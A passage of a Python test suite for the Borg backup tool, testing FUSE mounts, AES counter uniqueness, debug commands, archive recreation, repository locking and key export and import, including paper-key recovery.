        self.cmd('create', '--exclude-nodump', '--atime', self.repository_location + '::archive2', 'input')
        if has_lchflags:
            # remove the file we did not backup, so input and output become equal
            os.remove(os.path.join('input', 'flagfile'))
        mountpoint = os.path.join(self.tmpdir, 'mountpoint')
        # mount the whole repository, archive contents shall show up in archivename subdirs of mountpoint:
        with self.fuse_mount(self.repository_location, mountpoint):
            # bsdflags are not supported by the FUSE mount
            # we also ignore xattrs here, they are tested separately
            self.assert_dirs_equal(self.input_path, os.path.join(mountpoint, 'archive', 'input'),
                                   ignore_bsdflags=True, ignore_xattrs=True)
            self.assert_dirs_equal(self.input_path, os.path.join(mountpoint, 'archive2', 'input'),
                                   ignore_bsdflags=True, ignore_xattrs=True)
        # mount only 1 archive, its contents shall show up directly in mountpoint:
        with self.fuse_mount(self.repository_location + '::archive', mountpoint):
            self.assert_dirs_equal(self.input_path, os.path.join(mountpoint, 'input'),
                                   ignore_bsdflags=True, ignore_xattrs=True)
            # regular file
            in_fn = 'input/file1'
            out_fn = os.path.join(mountpoint, 'input', 'file1')
            # stat
            sti1 = os.stat(in_fn)
            sto1 = os.stat(out_fn)
            assert sti1.st_mode == sto1.st_mode
            assert sti1.st_uid == sto1.st_uid
            assert sti1.st_gid == sto1.st_gid
            assert sti1.st_size == sto1.st_size
            if have_noatime:
                assert sti1.st_atime == sto1.st_atime
            assert sti1.st_ctime == sto1.st_ctime
            assert sti1.st_mtime == sto1.st_mtime
            # note: there is another hardlink to this, see below
            assert sti1.st_nlink == sto1.st_nlink == 2
            # read
            with open(in_fn, 'rb') as in_f, open(out_fn, 'rb') as out_f:
                assert in_f.read() == out_f.read()
            # hardlink (to 'input/file1')
            if are_hardlinks_supported():
                in_fn = 'input/hardlink'
                out_fn = os.path.join(mountpoint, 'input', 'hardlink')
                sti2 = os.stat(in_fn)
                sto2 = os.stat(out_fn)
                assert sti2.st_nlink == sto2.st_nlink == 2
                assert sto1.st_ino == sto2.st_ino
            # symlink
            if are_symlinks_supported():
                in_fn = 'input/link1'
                out_fn = os.path.join(mountpoint, 'input', 'link1')
                sti = os.stat(in_fn, follow_symlinks=False)
                sto = os.stat(out_fn, follow_symlinks=False)
                assert sti.st_size == len('somewhere')
                assert sto.st_size == len('somewhere')
                assert stat.S_ISLNK(sti.st_mode)
                assert stat.S_ISLNK(sto.st_mode)
                assert os.readlink(in_fn) == os.readlink(out_fn)
            # FIFO
            if are_fifos_supported():
                out_fn = os.path.join(mountpoint, 'input', 'fifo1')
                sto = os.stat(out_fn)
                assert stat.S_ISFIFO(sto.st_mode)
            # list/read xattrs
            try:
                in_fn = 'input/fusexattr'
                out_fn = os.fsencode(os.path.join(mountpoint, 'input', 'fusexattr'))
                if not xattr.XATTR_FAKEROOT and xattr.is_enabled(self.input_path):
                    assert sorted(no_selinux(xattr.listxattr(out_fn))) == [b'user.empty', b'user.foo', ]
                    assert xattr.getxattr(out_fn, b'user.foo') == b'bar'
                    assert xattr.getxattr(out_fn, b'user.empty') == b''
                else:
                    assert no_selinux(xattr.listxattr(out_fn)) == []
                    try:
                        xattr.getxattr(out_fn, b'user.foo')
                    except OSError as e:
                        assert e.errno == llfuse.ENOATTR
                    else:
                        assert False, "expected OSError(ENOATTR), but no error was raised"
            except OSError as err:
                # NOTE(review): platform tuple 'nothing_here_now' makes this branch
                # effectively dead; presumably a disabled workaround for platforms
                # without xattr support on FUSE — confirm before removing.
                if sys.platform.startswith(('nothing_here_now', )) and err.errno == errno.ENOTSUP:
                    # some systems have no xattr support on FUSE
                    pass
                else:
                    raise
@unittest.skipUnless(has_llfuse, 'llfuse not installed')
def test_fuse_versions_view(self):
    """Mounting with -o versions shows each file as a directory of per-archive versions.

    Also verifies that hardlinks share an inode in the versions view, and that
    excluding the hardlink master still leaves the other links readable.
    """
    self.cmd('init', '--encryption=repokey', self.repository_location)
    self.create_regular_file('test', contents=b'first')
    if are_hardlinks_supported():
        self.create_regular_file('hardlink1', contents=b'123456')
        os.link('input/hardlink1', 'input/hardlink2')
        os.link('input/hardlink1', 'input/hardlink3')
    self.cmd('create', self.repository_location + '::archive1', 'input')
    self.create_regular_file('test', contents=b'second')
    self.cmd('create', self.repository_location + '::archive2', 'input')
    mountpoint = os.path.join(self.tmpdir, 'mountpoint')
    # mount the whole repository, archive contents shall show up in versioned view:
    with self.fuse_mount(self.repository_location, mountpoint, '-o', 'versions'):
        path = os.path.join(mountpoint, 'input', 'test')  # filename shows up as directory ...
        files = os.listdir(path)
        assert all(f.startswith('test.') for f in files)  # ... with files test.xxxxx in there
        # fix: use context managers instead of leaking handles via open(...).read()
        contents = set()
        for f in files:
            with open(os.path.join(path, f), 'rb') as fd:
                contents.add(fd.read())
        assert {b'first', b'second'} == contents
        if are_hardlinks_supported():
            hl1 = os.path.join(mountpoint, 'input', 'hardlink1', 'hardlink1.00001')
            hl2 = os.path.join(mountpoint, 'input', 'hardlink2', 'hardlink2.00001')
            hl3 = os.path.join(mountpoint, 'input', 'hardlink3', 'hardlink3.00001')
            assert os.stat(hl1).st_ino == os.stat(hl2).st_ino == os.stat(hl3).st_ino
            with open(hl3, 'rb') as fd:
                assert fd.read() == b'123456'
    # similar again, but exclude the hardlink master:
    with self.fuse_mount(self.repository_location, mountpoint, '-o', 'versions', '-e', 'input/hardlink1'):
        if are_hardlinks_supported():
            hl2 = os.path.join(mountpoint, 'input', 'hardlink2', 'hardlink2.00001')
            hl3 = os.path.join(mountpoint, 'input', 'hardlink3', 'hardlink3.00001')
            assert os.stat(hl2).st_ino == os.stat(hl3).st_ino
            with open(hl3, 'rb') as fd:
                assert fd.read() == b'123456'
@unittest.skipUnless(has_llfuse, 'llfuse not installed')
def test_fuse_allow_damaged_files(self):
    """Reading a damaged file via FUSE raises EIO, unless mounted with -o allow_damaged_files."""
    self.cmd('init', '--encryption=repokey', self.repository_location)
    self.create_src_archive('archive')
    # Get rid of a chunk and repair it
    archive, repository = self.open_archive('archive')
    with repository:
        for item in archive.iter_items():
            if item.path.endswith('testsuite/archiver.py'):
                repository.delete(item.chunks[-1].id)
                path = item.path  # store full path for later
                break
        else:
            assert False  # missed the file
        repository.commit(compact=False)
    # repair marks the file as damaged (chunk replaced by an all-zero placeholder)
    self.cmd('check', '--repair', self.repository_location, exit_code=0)
    mountpoint = os.path.join(self.tmpdir, 'mountpoint')
    with self.fuse_mount(self.repository_location + '::archive', mountpoint):
        # default mount: opening the damaged file must fail with EIO
        with pytest.raises(OSError) as excinfo:
            open(os.path.join(mountpoint, path))
        assert excinfo.value.errno == errno.EIO
    with self.fuse_mount(self.repository_location + '::archive', mountpoint, '-o', 'allow_damaged_files'):
        # opt-in mount option: the damaged file is readable again
        open(os.path.join(mountpoint, path)).close()
@unittest.skipUnless(has_llfuse, 'llfuse not installed')
def test_fuse_mount_options(self):
    """Archive selection options (--first/--last/--sort/--prefix) filter what a repo mount shows."""
    self.cmd('init', '--encryption=repokey', self.repository_location)
    for archive_name in ('arch11', 'arch12', 'arch21', 'arch22'):
        self.create_src_archive(archive_name)
    mountpoint = os.path.join(self.tmpdir, 'mountpoint')
    # each entry: (extra mount options, archive names expected at the mountpoint)
    cases = [
        (('--first=2', '--sort=name'), ['arch11', 'arch12']),
        (('--last=2', '--sort=name'), ['arch21', 'arch22']),
        (('--prefix=arch1',), ['arch11', 'arch12']),
        (('--prefix=arch2',), ['arch21', 'arch22']),
        (('--prefix=arch',), ['arch11', 'arch12', 'arch21', 'arch22']),
        (('--prefix=nope',), []),
    ]
    for options, expected in cases:
        with self.fuse_mount(self.repository_location, mountpoint, *options):
            assert sorted(os.listdir(os.path.join(mountpoint))) == expected
def verify_aes_counter_uniqueness(self, method):
    """Init a repo with the given encryption *method* and verify, after each
    repo-modifying command, that no AES-CTR counter value was ever reused.

    Counter (nonce) reuse with AES-CTR would be a catastrophic crypto failure,
    so this walks every object in the repository and records the counter range
    its encryption consumed.
    """
    seen = set()  # Chunks already seen
    used = set()  # counter values already used

    def verify_uniqueness():
        with Repository(self.repository_path) as repository:
            for id, _ in repository.open_index(repository.get_transaction_id()).iteritems():
                data = repository.get(id)
                hash = sha256(data).digest()
                if hash not in seen:
                    seen.add(hash)
                    # layout: ... MAC ..., nonce at bytes 33..41, ciphertext from 41
                    num_blocks = num_cipher_blocks(len(data) - 41)
                    nonce = bytes_to_long(data[33:41])
                    for counter in range(nonce, nonce + num_blocks):
                        # every counter value may be used at most once, ever
                        self.assert_not_in(counter, used)
                        used.add(counter)

    self.create_test_files()
    os.environ['BORG_PASSPHRASE'] = 'passphrase'
    self.cmd('init', '--encryption=' + method, self.repository_location)
    verify_uniqueness()
    self.cmd('create', self.repository_location + '::test', 'input')
    verify_uniqueness()
    self.cmd('create', self.repository_location + '::test.2', 'input')
    verify_uniqueness()
    self.cmd('delete', self.repository_location + '::test.2')
    verify_uniqueness()
def test_aes_counter_uniqueness_keyfile(self):
    # keyfile mode: key material stored client-side, next to the config
    self.verify_aes_counter_uniqueness('keyfile')
def test_aes_counter_uniqueness_passphrase(self):
    # repokey mode: key stored inside the repository, protected by passphrase
    self.verify_aes_counter_uniqueness('repokey')
def test_debug_dump_archive_items(self):
    """debug dump-archive-items writes one sequentially numbered file per metadata chunk."""
    self.create_test_files()
    self.cmd('init', '--encryption=repokey', self.repository_location)
    self.cmd('create', self.repository_location + '::test', 'input')
    with changedir('output'):
        output = self.cmd('debug', 'dump-archive-items', self.repository_location + '::test')
    dumped_files = sorted(os.listdir('output'))
    assert len(dumped_files) > 0 and dumped_files[0].startswith('000000_')
    assert 'Done.' in output
def test_debug_dump_repo_objs(self):
    """debug dump-repo-objs writes one sequentially numbered file per repository object."""
    self.create_test_files()
    self.cmd('init', '--encryption=repokey', self.repository_location)
    self.cmd('create', self.repository_location + '::test', 'input')
    with changedir('output'):
        output = self.cmd('debug', 'dump-repo-objs', self.repository_location)
    dumped_files = sorted(os.listdir('output'))
    assert len(dumped_files) > 0 and dumped_files[0].startswith('00000000_')
    assert 'Done.' in output
def test_debug_put_get_delete_obj(self):
    """Round-trip a raw object through debug put-obj / get-obj / delete-obj."""
    self.cmd('init', '--encryption=repokey', self.repository_location)
    payload = b'some data'
    hexkey = sha256(payload).hexdigest()
    self.create_regular_file('file', contents=payload)
    # put and get both echo the object's id
    assert hexkey in self.cmd('debug', 'put-obj', self.repository_location, 'input/file')
    assert hexkey in self.cmd('debug', 'get-obj', self.repository_location, hexkey, 'output/file')
    with open('output/file', 'rb') as f:
        assert f.read() == payload
    # first delete succeeds, second sees the object already gone
    assert "deleted" in self.cmd('debug', 'delete-obj', self.repository_location, hexkey)
    assert "not found" in self.cmd('debug', 'delete-obj', self.repository_location, hexkey)
    # a non-hex id is rejected outright
    assert "is invalid" in self.cmd('debug', 'delete-obj', self.repository_location, 'invalid')
def test_init_interrupt(self):
    """An EOF while creating the key must abort init and leave no repository behind."""
    def abort_key_creation(*args):
        raise EOFError

    with patch.object(KeyfileKeyBase, 'create', abort_key_creation):
        self.cmd('init', '--encryption=repokey', self.repository_location, exit_code=1)
    # a half-initialized repo directory must not remain
    assert not os.path.exists(self.repository_location)
def test_init_requires_encryption_option(self):
    # init without an explicit --encryption choice is a usage error (rc 2)
    self.cmd('init', self.repository_location, exit_code=2)
def test_init_nested_repositories(self):
    """Creating a repository inside an existing repository is refused."""
    self.cmd('init', '--encryption=repokey', self.repository_location)
    if self.FORK_DEFAULT:
        # forked borg: the failure surfaces only as exit code 2
        self.cmd('init', '--encryption=repokey', self.repository_location + '/nested', exit_code=2)
    else:
        # in-process: the underlying exception is observable directly
        with pytest.raises(Repository.AlreadyExists):
            self.cmd('init', '--encryption=repokey', self.repository_location + '/nested')
def check_cache(self):
    """Run `borg check`, then verify the on-disk chunks cache exactly matches a
    cache rebuilt from the repository.

    Raises AssertionError if any chunk's refcount/size/csize differ between the
    two caches, or if either cache contains chunk ids the other lacks.
    """
    # First run a regular borg check
    self.cmd('check', self.repository_location)
    # Then check that the cache on disk matches exactly what's in the repo.
    with self.open_repository() as repository:
        manifest, key = Manifest.load(repository, Manifest.NO_OPERATION_CHECK)
        # sync=False: take the cache as-is from disk, do not resync it first
        with Cache(repository, key, manifest, sync=False) as cache:
            original_chunks = cache.chunks
        # destroy the cache and let Cache rebuild it from the repository
        Cache.destroy(repository)
        with Cache(repository, key, manifest) as cache:
            correct_chunks = cache.chunks
    assert original_chunks is not correct_chunks
    seen = set()
    # every rebuilt entry must match the on-disk entry field by field
    for id, (refcount, size, csize) in correct_chunks.iteritems():
        o_refcount, o_size, o_csize = original_chunks[id]
        assert refcount == o_refcount
        assert size == o_size
        assert csize == o_csize
        seen.add(id)
    # and the on-disk cache must not contain extra chunk ids
    for id, (refcount, size, csize) in original_chunks.iteritems():
        assert id in seen
def test_check_cache(self):
    """check_cache() must detect a deliberately corrupted (over-incremented) chunks cache."""
    self.cmd('init', '--encryption=repokey', self.repository_location)
    self.cmd('create', self.repository_location + '::test', 'input')
    with self.open_repository() as repository:
        manifest, key = Manifest.load(repository, Manifest.NO_OPERATION_CHECK)
        with Cache(repository, key, manifest, sync=False) as cache:
            cache.begin_txn()
            # bump the refcount of an arbitrary chunk so cache and repo disagree
            cache.chunks.incref(list(cache.chunks.iteritems())[0][0])
            cache.commit()
    with pytest.raises(AssertionError):
        self.check_cache()
def test_recreate_target_rc(self):
    """recreate --target without a single source archive is a usage error (rc 2)."""
    self.cmd('init', '--encryption=repokey', self.repository_location)
    message = self.cmd('recreate', self.repository_location, '--target=asdf', exit_code=2)
    assert 'Need to specify single archive' in message
def test_recreate_target(self):
    """recreate --target writes a filtered copy under a new name and keeps the original archive."""
    self.create_test_files()
    self.cmd('init', '--encryption=repokey', self.repository_location)
    self.check_cache()
    source = self.repository_location + '::test0'
    self.cmd('create', source, 'input')
    self.check_cache()
    archives_before = self.cmd('list', self.repository_location)
    self.cmd('recreate', source, 'input/dir2', '-e', 'input/dir2/file3', '--target=new-archive')
    self.check_cache()
    archives_after = self.cmd('list', self.repository_location)
    # the original archive is untouched and the filtered copy exists alongside it
    assert archives_before in archives_after
    assert 'new-archive' in archives_after
    listing = self.cmd('list', '--short', self.repository_location + '::new-archive')
    # only dir2 was kept, and file3 was excluded from it
    assert 'file1' not in listing
    assert 'dir2/file2' in listing
    assert 'dir2/file3' not in listing
def test_recreate_basic(self):
    """In-place recreate keeps only the requested paths, minus excludes."""
    self.create_test_files()
    self.create_regular_file('dir2/file3', size=1024 * 80)
    self.cmd('init', '--encryption=repokey', self.repository_location)
    target = self.repository_location + '::test0'
    self.cmd('create', target, 'input')
    self.cmd('recreate', target, 'input/dir2', '-e', 'input/dir2/file3')
    self.check_cache()
    listing = self.cmd('list', '--short', target)
    # only dir2 survives, and file3 was excluded from it
    assert 'file1' not in listing
    assert 'dir2/file2' in listing
    assert 'dir2/file3' not in listing
@pytest.mark.skipif(not are_hardlinks_supported(), reason='hardlinks not supported')
def test_recreate_subtree_hardlinks(self):
    """Recreating a subtree keeps hardlink groups intact, in both the recreated
    and the untouched archive."""
    # This is essentially the same problem set as in test_extract_hardlinks
    self._extract_hardlinks_setup()
    self.cmd('create', self.repository_location + '::test2', 'input')
    self.cmd('recreate', self.repository_location + '::test', 'input/dir1')
    self.check_cache()
    with changedir('output'):
        self.cmd('extract', self.repository_location + '::test')
        # recreated archive: the link pairs inside dir1 are preserved
        assert os.stat('input/dir1/hardlink').st_nlink == 2
        assert os.stat('input/dir1/subdir/hardlink').st_nlink == 2
        assert os.stat('input/dir1/aaaa').st_nlink == 2
        assert os.stat('input/dir1/source2').st_nlink == 2
    with changedir('output'):
        self.cmd('extract', self.repository_location + '::test2')
        # untouched archive: the file still has all four links
        assert os.stat('input/dir1/hardlink').st_nlink == 4
def test_recreate_rechunkify(self):
    """recreate --chunker-params re-chunks archives so they deduplicate against each other."""
    with open(os.path.join(self.input_path, 'large_file'), 'wb') as fd:
        fd.write(b'a' * 280)
        fd.write(b'b' * 280)
    self.cmd('init', '--encryption=repokey', self.repository_location)
    # test1 uses tiny chunks, test2 default chunks -> no dedup between them
    self.cmd('create', '--chunker-params', '7,9,8,128', self.repository_location + '::test1', 'input')
    self.cmd('create', self.repository_location + '::test2', 'input', '--files-cache=disabled')
    # fix: renamed `list` - it shadowed the builtin
    chunk_info = self.cmd('list', self.repository_location + '::test1', 'input/large_file',
                          '--format', '{num_chunks} {unique_chunks}')
    num_chunks, unique_chunks = map(int, chunk_info.split(' '))
    # test1 and test2 do not deduplicate
    assert num_chunks == unique_chunks
    self.cmd('recreate', self.repository_location, '--chunker-params', 'default')
    self.check_cache()
    # test1 and test2 do deduplicate after recreate
    assert int(self.cmd('list', self.repository_location + '::test1', 'input/large_file', '--format={size}'))
    assert not int(self.cmd('list', self.repository_location + '::test1', 'input/large_file',
                            '--format', '{unique_chunks}'))
def test_recreate_recompress(self):
    """recreate --recompress changes the stored compression without altering content."""
    self.create_regular_file('compressible', size=10000)
    self.cmd('init', '--encryption=repokey', self.repository_location)
    self.cmd('create', self.repository_location + '::test', 'input', '-C', 'none')
    fmt = '{size} {csize} {sha256}'
    size, csize, sha256_before = self.cmd(
        'list', self.repository_location + '::test', 'input/compressible', '--format', fmt).split(' ')
    assert int(csize) >= int(size)  # >= due to metadata overhead
    self.cmd('recreate', self.repository_location, '-C', 'lz4', '--recompress')
    self.check_cache()
    size, csize, sha256_after = self.cmd(
        'list', self.repository_location + '::test', 'input/compressible', '--format', fmt).split(' ')
    assert int(csize) < int(size)  # now actually compressed
    assert sha256_before == sha256_after  # file content unchanged
def test_recreate_timestamp(self):
    """recreate --timestamp rewrites the archive's start/end time."""
    # offset-aware local timezone, needed to convert the stored UTC timestamp
    local_timezone = datetime.now(timezone(timedelta(0))).astimezone().tzinfo
    self.create_test_files()
    self.cmd('init', '--encryption=repokey', self.repository_location)
    archive = self.repository_location + '::test0'
    self.cmd('create', archive, 'input')
    self.cmd('recreate', '--timestamp', "1970-01-02T00:00:00", '--comment',
             'test', archive)
    info = self.cmd('info', archive).splitlines()
    # borg prints times in local time; shift the expected date accordingly
    dtime = datetime(1970, 1, 2) + local_timezone.utcoffset(None)
    s_time = dtime.strftime("%Y-%m-%d")
    assert any([re.search(r'Time \(start\).+ %s' % s_time, item) for item in info])
    assert any([re.search(r'Time \(end\).+ %s' % s_time, item) for item in info])
def test_recreate_dry_run(self):
    """recreate -n (dry-run) must not modify the archive."""
    self.create_regular_file('compressible', size=10000)
    self.cmd('init', '--encryption=repokey', self.repository_location)
    self.cmd('create', self.repository_location + '::test', 'input')
    listing_before = self.cmd('list', self.repository_location + '::test')
    self.cmd('recreate', self.repository_location, '-n', '-e', 'input/compressible')
    self.check_cache()
    listing_after = self.cmd('list', self.repository_location + '::test')
    # the exclude must NOT have been applied
    assert listing_after == listing_before
def test_recreate_skips_nothing_to_do(self):
    """A no-op recreate leaves the archive completely untouched (same archive ID)."""
    self.create_regular_file('file1', size=1024 * 80)
    self.cmd('init', '--encryption=repokey', self.repository_location)
    archive = self.repository_location + '::test'
    self.cmd('create', archive, 'input')
    before = self.cmd('info', archive)
    self.cmd('recreate', self.repository_location, '--chunker-params', 'default')
    self.check_cache()
    # identical info output (it includes the archive ID) -> nothing was rewritten
    assert before == self.cmd('info', archive)
def test_with_lock(self):
    """with-lock must hold the exclusive repo lock while the subcommand runs."""
    self.cmd('init', '--encryption=repokey', self.repository_location)
    lock_path = os.path.join(self.repository_path, 'lock.exclusive')
    # the subprocess exits 42 if the lock file exists (as it should), 23 otherwise;
    # with-lock propagates the subcommand's exit code
    cmd = 'python3', '-c', 'import os, sys; sys.exit(42 if os.path.exists("%s") else 23)' % lock_path
    self.cmd('with-lock', self.repository_location, *cmd, fork=True, exit_code=42)
def test_recreate_list_output(self):
    """recreate logs per-file actions only when --list is given (with or without --info)."""
    self.cmd('init', '--encryption=repokey', self.repository_location)
    for name in ('file1', 'file2', 'file3', 'file4', 'file5'):
        self.create_regular_file(name, size=0)
    self.cmd('create', self.repository_location + '::test', 'input')
    # each entry: (extra flags, excluded file, whether per-file output is expected)
    cases = [
        (('--list', '--info'), 'input/file2', True),
        (('--list',), 'input/file3', True),
        ((), 'input/file4', False),
        (('--info',), 'input/file5', False),
    ]
    for flags, excluded, listed in cases:
        output = self.cmd('recreate', *flags, self.repository_location + '::test', '-e', excluded)
        self.check_cache()
        if listed:
            self.assert_in("input/file1", output)
            self.assert_in("x " + excluded, output)
        else:
            self.assert_not_in("input/file1", output)
            self.assert_not_in("x " + excluded, output)
def test_bad_filters(self):
    # combining --first and --last makes no sense for delete -> usage error (rc 2)
    self.cmd('init', '--encryption=repokey', self.repository_location)
    self.cmd('create', self.repository_location + '::test', 'input')
    self.cmd('delete', '--first', '1', '--last', '1', self.repository_location, fork=True, exit_code=2)
def test_key_export_keyfile(self):
    """key export writes the keyfile key; key import restores it byte-for-byte."""
    export_file = self.output_path + '/exported'
    self.cmd('init', self.repository_location, '--encryption', 'keyfile')
    repo_id = self._extract_repository_id(self.repository_path)
    self.cmd('key', 'export', self.repository_location, export_file)
    with open(export_file, 'r') as fd:
        exported = fd.read()
    # the export is tagged with the repository id it belongs to
    assert exported.startswith('BORG_KEY ' + bin_to_hex(repo_id) + '\n')
    key_file = self.keys_path + '/' + os.listdir(self.keys_path)[0]
    with open(key_file, 'r') as fd:
        original_key = fd.read()
    assert original_key == exported
    # delete the local key file, then restore it via key import
    os.unlink(key_file)
    self.cmd('key', 'import', self.repository_location, export_file)
    with open(key_file, 'r') as fd:
        restored_key = fd.read()
    assert restored_key == original_key
def test_key_export_repokey(self):
    """key export of a repokey matches the stored key; key import restores a wiped key."""
    export_file = self.output_path + '/exported'
    self.cmd('init', self.repository_location, '--encryption', 'repokey')
    repo_id = self._extract_repository_id(self.repository_path)
    self.cmd('key', 'export', self.repository_location, export_file)
    with open(export_file, 'r') as fd:
        export_contents = fd.read()
    assert export_contents.startswith('BORG_KEY ' + bin_to_hex(repo_id) + '\n')
    with Repository(self.repository_path) as repository:
        repo_key = RepoKey(repository)
        repo_key.load(None, Passphrase.env_passphrase())
    backup_key = KeyfileKey(key.TestKey.MockRepository())
    backup_key.load(export_file, Passphrase.env_passphrase())
    assert repo_key.enc_key == backup_key.enc_key
    # wipe the key stored in the repository, then restore it from the export
    with Repository(self.repository_path) as repository:
        repository.save_key(b'')
    self.cmd('key', 'import', self.repository_location, export_file)
    with Repository(self.repository_path) as repository:
        repo_key2 = RepoKey(repository)
        repo_key2.load(None, Passphrase.env_passphrase())
    # fix: the original asserted repo_key2.enc_key == repo_key2.enc_key, which
    # compares the key to itself and is vacuously true; the re-imported key
    # must equal the exported one
    assert repo_key2.enc_key == backup_key.enc_key
def test_key_export_qr(self):
    """key export --qr-html produces a self-contained HTML page embedding the repo id."""
    export_file = self.output_path + '/exported.html'
    self.cmd('init', self.repository_location, '--encryption', 'repokey')
    repo_id = self._extract_repository_id(self.repository_path)
    self.cmd('key', 'export', '--qr-html', self.repository_location, export_file)
    with open(export_file, 'r', encoding='utf-8') as fd:
        page = fd.read()
    assert bin_to_hex(repo_id) in page
    assert page.startswith('<!doctype html>')
    assert page.endswith('</html>')
def test_key_export_directory(self):
    # exporting to a path that is an existing directory must fail cleanly
    export_directory = self.output_path + '/exported'
    os.mkdir(export_directory)
    self.cmd('init', self.repository_location, '--encryption', 'repokey')
    self.cmd('key', 'export', self.repository_location, export_directory, exit_code=EXIT_ERROR)
def test_key_import_errors(self):
    """key import rejects a missing file, a non-key file, and a key for another repo."""
    export_file = self.output_path + '/exported'
    self.cmd('init', self.repository_location, '--encryption', 'keyfile')
    # importing a non-existent file fails
    self.cmd('key', 'import', self.repository_location, export_file, exit_code=EXIT_ERROR)
    # a file that is not a borg key file
    with open(export_file, 'w') as fd:
        fd.write('something not a key\n')
    if self.FORK_DEFAULT:
        self.cmd('key', 'import', self.repository_location, export_file, exit_code=2)
    else:
        with pytest.raises(NotABorgKeyFile):
            self.cmd('key', 'import', self.repository_location, export_file)
    # a syntactically valid key whose repository id does not match this repo
    with open(export_file, 'w') as fd:
        fd.write('BORG_KEY a0a0a0\n')
    if self.FORK_DEFAULT:
        self.cmd('key', 'import', self.repository_location, export_file, exit_code=2)
    else:
        with pytest.raises(RepoIdMismatch):
            self.cmd('key', 'import', self.repository_location, export_file)
def test_key_export_paperkey(self):
    """key export --paper prints the key with per-line and overall checksums."""
    repo_id = 'e294423506da4e1ea76e8dcdf1a3919624ae3ae496fddf905610c351d3f09239'
    export_file = self.output_path + '/exported'
    self.cmd('init', self.repository_location, '--encryption', 'keyfile')
    self._set_repository_id(self.repository_path, unhexlify(repo_id))
    key_file = self.keys_path + '/' + os.listdir(self.keys_path)[0]
    # replace the generated key with fixed, known key material so the
    # paper-key output is deterministic and can be compared verbatim
    with open(key_file, 'w') as fd:
        fd.write(KeyfileKey.FILE_ID + ' ' + repo_id + '\n')
        fd.write(b2a_base64(b'abcdefghijklmnopqrstu').decode())
    self.cmd('key', 'export', '--paper', self.repository_location, export_file)
    with open(export_file, 'r') as fd:
        export_contents = fd.read()
    assert export_contents == """To restore key use borg key import --paper /path/to/repo
BORG PAPER KEY v1
id: 2 / e29442 3506da 4e1ea7 / 25f62a 5a3d41 - 02
1: 616263 646566 676869 6a6b6c 6d6e6f 707172 - 6d
2: 737475 - 88
"""
def test_key_import_paperkey(self):
    """key import --paper recovers from typos, checksum mismatches, and aborts."""
    repo_id = 'e294423506da4e1ea76e8dcdf1a3919624ae3ae496fddf905610c351d3f09239'
    self.cmd('init', self.repository_location, '--encryption', 'keyfile')
    self._set_repository_id(self.repository_path, unhexlify(repo_id))
    key_file = self.keys_path + '/' + os.listdir(self.keys_path)[0]
    # use fixed key material so the expected paper-key lines are known
    with open(key_file, 'w') as fd:
        fd.write(KeyfileKey.FILE_ID + ' ' + repo_id + '\n')
        fd.write(b2a_base64(b'abcdefghijklmnopqrstu').decode())
    # simulated interactive typing, including every recoverable error class
    typed_input = (
        b'2 / e29442 3506da 4e1ea7 / 25f62a 5a3d41 02\n'    # Forgot to type "-"
        b'2 / e29442 3506da 4e1ea7 25f62a 5a3d41 - 02\n'    # Forgot to type second "/"
        b'2 / e29442 3506da 4e1ea7 / 25f62a 5a3d42 - 02\n'  # Typo (..42 not ..41)
        b'2 / e29442 3506da 4e1ea7 / 25f62a 5a3d41 - 02\n'  # Correct! Congratulations
        b'616263 646566 676869 6a6b6c 6d6e6f 707172 - 6d\n'
        b'\n\n'  # Abort [yN] => N
        b'737475 88\n'  # missing "-"
        b'73747i - 88\n'  # typo
        b'73747 - 88\n'  # missing nibble
        b'73 74 75 - 89\n'  # line checksum mismatch
        b'00a1 - 88\n'  # line hash collision - overall hash mismatch, have to start over
        b'2 / e29442 3506da 4e1ea7 / 25f62a 5a3d41 - 02\n'
        b'616263 646566 676869 6a6b6c 6d6e6f 707172 - 6d\n'
        b'73 74 75 - 88\n'
    )
    # In case that this has to change, here is a quick way to find a colliding line hash:
    #
    # from hashlib import sha256
    # hash_fn = lambda x: sha256(b'\x00\x02' + x).hexdigest()[:2]
    # for i in range(1000):
    #     if hash_fn(i.to_bytes(2, byteorder='big')) == '88':  # 88 = line hash
    #         print(i.to_bytes(2, 'big'))
    #         break
    self.cmd('key', 'import', '--paper', self.repository_location, input=typed_input)
    # Test abort paths
    typed_input = b'\ny\n'
    self.cmd('key', 'import', '--paper', self.repository_location, input=typed_input)
    typed_input = b'2 / e29442 3506da 4e1ea7 / 25f62a 5a3d41 - 02\n\ny\n'
    self.cmd('key', 'import', '--paper', self.repository_location, input=typed_input)
def test_debug_dump_manifest(self):
    """debug dump-manifest writes the decoded manifest as JSON with all expected sections."""
    self.create_regular_file('file1', size=1024 * 80)
    self.cmd('init', '--encryption=repokey', self.repository_location)
    self.cmd('create', self.repository_location + '::test', 'input')
    dump_file = self.output_path + '/dump'
    output = self.cmd('debug', 'dump-manifest', self.repository_location, dump_file)
    assert output == ""
    with open(dump_file, "r") as f:
        result = json.load(f)
    for section in ('archives', 'config', 'item_keys', 'timestamp', 'version'):
        assert section in result
def test_debug_dump_archive(self):
    """debug dump-archive writes archive metadata and items as JSON with all expected sections."""
    self.create_regular_file('file1', size=1024 * 80)
    self.cmd('init', '--encryption=repokey', self.repository_location)
    self.cmd('create', self.repository_location + '::test', 'input')
    dump_file = self.output_path + '/dump'
    output = self.cmd('debug', 'dump-archive', self.repository_location + "::test", dump_file)
    assert output == ""
    with open(dump_file, "r") as f:
        result = json.load(f)
    for section in ('_name', '_manifest_entry', '_meta', '_items'):
        assert section in result
def test_debug_refcount_obj(self):
    """debug refcount-obj reports referrer counts from the chunks cache."""
    self.cmd('init', '--encryption=repokey', self.repository_location)
    # an all-zero id exists nowhere in a fresh repo
    output = self.cmd('debug', 'refcount-obj', self.repository_location, '0' * 64).strip()
    assert output == 'object 0000000000000000000000000000000000000000000000000000000000000000 not found [info from chunks cache].'
    # the archive metadata object itself has exactly one referrer
    create_json = json.loads(self.cmd('create', '--json', self.repository_location + '::test', 'input'))
    archive_id = create_json['archive']['id']
    output = self.cmd('debug', 'refcount-obj', self.repository_location, archive_id).strip()
    assert output == 'object ' + archive_id + ' has 1 referrers [info from chunks cache].'
    # Invalid IDs do not abort or return an error
    output = self.cmd('debug', 'refcount-obj', self.repository_location, '124', 'xyza').strip()
    assert output == 'object id 124 is invalid.\nobject id xyza is invalid.'
def test_debug_info(self):
    """debug info reports build and runtime details."""
    output = self.cmd('debug', 'info')
    for needle in ('CRC implementation', 'Python'):
        assert needle in output
def test_benchmark_crud(self):
    # smoke test only; _BORG_BENCHMARK_CRUD_TEST=YES makes the benchmark use a tiny workload
    self.cmd('init', '--encryption=repokey', self.repository_location)
    with environment_variable(_BORG_BENCHMARK_CRUD_TEST='YES'):
